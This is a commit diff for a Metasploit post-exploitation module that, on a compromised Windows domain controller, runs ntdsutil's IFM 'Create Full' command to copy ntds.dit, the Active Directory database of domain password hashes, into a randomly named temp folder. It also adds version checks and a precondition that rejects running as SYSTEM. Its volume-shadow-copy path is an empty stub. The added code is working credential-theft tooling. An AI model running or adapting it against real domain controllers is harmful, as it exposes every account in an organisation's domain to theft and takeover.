ntdsutil method in place

ntdsutil method built out to make a copy
of ntds.dit on later version of Winbdows Server

MSP-12358

Author: David Maloney

modules/post/windows/gather/credentials/domain_hashdump.rb

@@ -31,19 +31,21 @@ def initialize(info={})
 
   def run
     if preconditions_met?
-      copy_database_file
+      ntds_file = copy_database_file
     end
   end
 
   def copy_database_file
     database_file_path = nil
     case  sysinfo["OS"]
       when /2003/
-
+        database_file_path = vss_method
       when /2008|2012/
+        database_file_path = ntdsutil_method
       else
         print_error "This version of Windows in unsupported"
     end
+    database_file_path
   end
 
   def is_domain_controller?
@@ -57,6 +59,20 @@ def is_domain_controller?
     status
   end
 
+  def ntdsutil_method
+    tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
+    result = cmd_exec("ntdsutil.exe", command_arguments)
+    if result.include? "IFM media created successfully"
+      file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
+    else
+      print_error "There was an error copying the ntds.dit file!"
+      file_path = nil
+    end
+    file_path
+  end
+
+
   def preconditions_met?
     status = true
     unless is_domain_controller?
@@ -71,8 +87,15 @@ def preconditions_met?
       print_error "This module requires UAC to be bypassed first"
       status = false
     end
+    if is_system?
+      print_error "Volume Shadow Copy will not work properly as SYSTEM, migrate to a real user"
+      status = false
+    end
     return status
   end
 
+  def vss_method
+
+  end
 
 end